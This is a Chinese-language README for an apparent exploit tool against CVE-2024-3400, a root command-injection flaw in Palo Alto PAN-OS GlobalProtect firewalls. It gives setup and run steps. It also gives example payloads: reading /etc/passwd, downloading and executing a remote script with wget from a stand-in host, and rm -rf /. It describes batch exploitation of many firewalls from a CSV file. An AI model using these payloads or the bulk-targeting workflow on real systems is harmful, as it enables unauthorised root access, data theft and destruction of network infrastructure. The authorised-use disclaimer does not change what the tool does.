此脚本旨在演示 PAN-OS 防火墙中漏洞的利用方法。它会向防火墙的 API 端点发送特制载荷,以执行任意命令。该漏洞利用特别针对 CVE-2024-3400,这是 Palo Alto Networks PAN-OS 软件 GlobalProtect 功能中存在于特定 PAN-OS 版本上的命令注入漏洞。不同的功能配置可能允许未经身份验证的攻击者在防火墙上以 root 权限执行任意代码。
注意: 请确保仅将本脚本用于合法和道德的目的,并且仅在你拥有测试权限的机器上使用。
要使用此项目,请遵循以下步骤:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
按照提示输入易受攻击的 PAN-OS 防火墙的 IP 地址以及要执行的载荷。
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
脚本会询问 PAN-OS 防火墙服务器 SSL 证书的文件路径。如果未提供路径,脚本会自动将 SSL 验证设置为 false,从而有效禁用 SSL。
该脚本允许你通过 CSV 文件批量利用多个易受攻击的 PAN-OS 防火墙目标。以下是正确格式化 CSV 文件的说明:
CSV 文件应包含三列:
ipaddress:易受攻击的 PAN-OS 防火墙的 IP 地址。
payload:要在防火墙上执行的载荷。
path/to/root_CA_certificate.pem:根 CA 证书的路径(如果禁用证书验证则留空)。
示例 CSV 文件:
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
按照指定格式创建 CSV 文件。 填写 IP 地址、载荷以及根 CA 证书路径(如适用)。 确保提供有效的根 CA 证书路径,如果禁用证书验证则将该字段留空。 运行脚本并在提示时选择使用 CSV 文件的选项。